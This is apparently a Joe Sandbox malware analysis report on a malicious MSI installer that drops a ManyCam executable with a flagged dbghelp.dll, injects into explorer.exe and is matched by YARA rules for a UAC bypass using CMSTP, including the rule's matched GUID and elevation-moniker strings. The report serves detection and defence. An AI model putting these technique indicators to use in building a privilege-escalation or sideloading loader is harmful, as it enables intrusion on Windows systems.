Edit tour

Windows Analysis Report
kvW4hZu9JA.msi

Overview

General Information

Sample name:	kvW4hZu9JA.msi renamed because original name is a hash value
Original sample name:	9cd2698d22ea6c144489b104d7d4680392f5ec333791fe164090b513b3073a7c.msi
Analysis ID:	1536942
MD5:	2de2b3c8fa96e43890e49ecbfe0eccb0
SHA1:	ce46ea6169c109297d2b09ef9b240affe6623037
SHA256:	9cd2698d22ea6c144489b104d7d4680392f5ec333791fe164090b513b3073a7c
Tags:	fsb-rodeomsiuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Checks for available system drives (often done to infect USB drives)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 6856 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\kvW4hZu9JA.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7000 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

ManyCam.exe (PID: 6228 cmdline: "C:\Users\user\AppData\Local\Hazan\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 1620 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Hazan\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

ManyCam.exe (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 4564 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

cmd.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 5548 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

ManyCam.exe (PID: 6304 cmdline: "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 792 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

cmd.exe (PID: 5468 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ManyCam.exe (PID: 6372 cmdline: "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe" MD5: BA699791249C311883BAA8CE3432703B)

pcaui.exe (PID: 6408 cmdline: "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe" MD5: 0BA34D8D0BD01CB98F912114ACC7CF19)

cmd.exe (PID: 3636 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 6276 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.2200981328.0000000002B70000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ManyCam.exe PID: 6228	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ManyCam.exe PID: 5356	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 2260	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 5548	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ManyCam.exe PID: 6304	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5468	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: ManyCam.exe PID: 6372	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 3636	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 6276	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.ManyCam.exe.41f8430.8.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.ManyCam.exe.41f8430.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
12.2.explorer.exe.29625d9.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.explorer.exe.29625d9.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
13.2.ManyCam.exe.41fe830.11.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.ManyCam.exe.41fe830.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
22.2.cmd.exe.58fa9b9.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.cmd.exe.58fa9b9.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
6.2.cmd.exe.4d5d5b9.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.4d5d5b9.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
6.2.cmd.exe.4d5c9b9.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.4d5c9b9.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
13.2.ManyCam.exe.41ff430.9.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.ManyCam.exe.41ff430.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
15.2.cmd.exe.4b2d9b9.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.4b2d9b9.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
2.2.ManyCam.exe.41f7830.10.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.ManyCam.exe.41f7830.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
24.2.explorer.exe.2ce89d9.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.explorer.exe.2ce89d9.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
4.2.ManyCam.exe.3db5763.11.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.ManyCam.exe.3db5763.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
15.2.cmd.exe.4b2e5b9.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.4b2e5b9.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
15.2.cmd.exe.2b44a08.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.2b44a08.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x3c150:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3c118:$s2: Elevation:Administrator!new:
6.2.cmd.exe.4d178ec.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.4d178ec.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
13.2.ManyCam.exe.41b9763.10.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.ManyCam.exe.41b9763.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
15.2.cmd.exe.4ae88ec.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.4ae88ec.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
24.2.explorer.exe.2ca390c.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.explorer.exe.2ca390c.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
4.2.ManyCam.exe.3dfa830.8.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.ManyCam.exe.3dfa830.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
24.2.explorer.exe.2ce95d9.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.explorer.exe.2ce95d9.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
22.2.cmd.exe.58fb5b9.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.cmd.exe.58fb5b9.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
12.2.explorer.exe.291c90c.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.explorer.exe.291c90c.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
15.2.cmd.exe.2b707f8.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.2b707f8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10f28:$s2: Elevation:Administrator!new:
12.2.explorer.exe.29619d9.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.explorer.exe.29619d9.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
20.2.ManyCam.exe.3de6430.11.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.ManyCam.exe.3de6430.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
20.2.ManyCam.exe.3de5830.10.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.ManyCam.exe.3de5830.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd0b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd96:$s1: CoGetObject 0x1dcef:$s2: Elevation:Administrator!new:
4.2.ManyCam.exe.3dfb430.10.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.ManyCam.exe.3dfb430.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d10b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d196:$s1: CoGetObject 0x1d0ef:$s2: Elevation:Administrator!new:
2.2.ManyCam.exe.41b2763.9.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.ManyCam.exe.41b2763.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
20.2.ManyCam.exe.3da0763.8.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.ManyCam.exe.3da0763.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
22.2.cmd.exe.58b58ec.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.cmd.exe.58b58ec.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62dd8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e63:$s1: CoGetObject 0x62dbc:$s2: Elevation:Administrator!new:
Click to see the 53 entries

Sigma Signatures

System Summary

Sigma detected: Proxy Execution Via Explorer.exe

Source: Process started

Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\explorer.exe, CommandLine: C:\Windows\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2260, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\explorer.exe, ProcessId: 5548, ProcessName: explorer.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Hazan\dbghelp.dll	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\blggjuprkr	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\klxgok	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\dbghelp.dll	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: kvW4hZu9JA.msi

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\blggjuprkr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\klxgok	Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 2.2.ManyCam.exe.41f8430.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.explorer.exe.29625d9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ManyCam.exe.41fe830.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.58fa9b9.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.4d5d5b9.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.4d5c9b9.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ManyCam.exe.41ff430.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.4b2d9b9.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ManyCam.exe.41f7830.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.explorer.exe.2ce89d9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ManyCam.exe.3db5763.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.4b2e5b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.2b44a08.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.4d178ec.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ManyCam.exe.41b9763.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.4ae88ec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.explorer.exe.2ca390c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ManyCam.exe.3dfa830.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.explorer.exe.2ce95d9.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.58fb5b9.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.explorer.exe.291c90c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.2b707f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.explorer.exe.29619d9.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ManyCam.exe.3de6430.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ManyCam.exe.3de5830.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ManyCam.exe.3dfb430.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ManyCam.exe.41b2763.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ManyCam.exe.3da0763.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.58b58ec.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2200981328.0000000002B70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
